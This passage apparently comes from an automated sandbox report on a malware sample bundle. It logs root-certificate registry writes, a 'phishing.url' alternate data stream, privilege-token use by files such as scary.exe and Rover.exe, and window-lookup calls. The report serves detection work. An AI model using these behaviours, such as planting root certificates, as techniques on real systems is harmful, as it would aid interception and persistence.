Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\phishing.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Runs net.exe

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
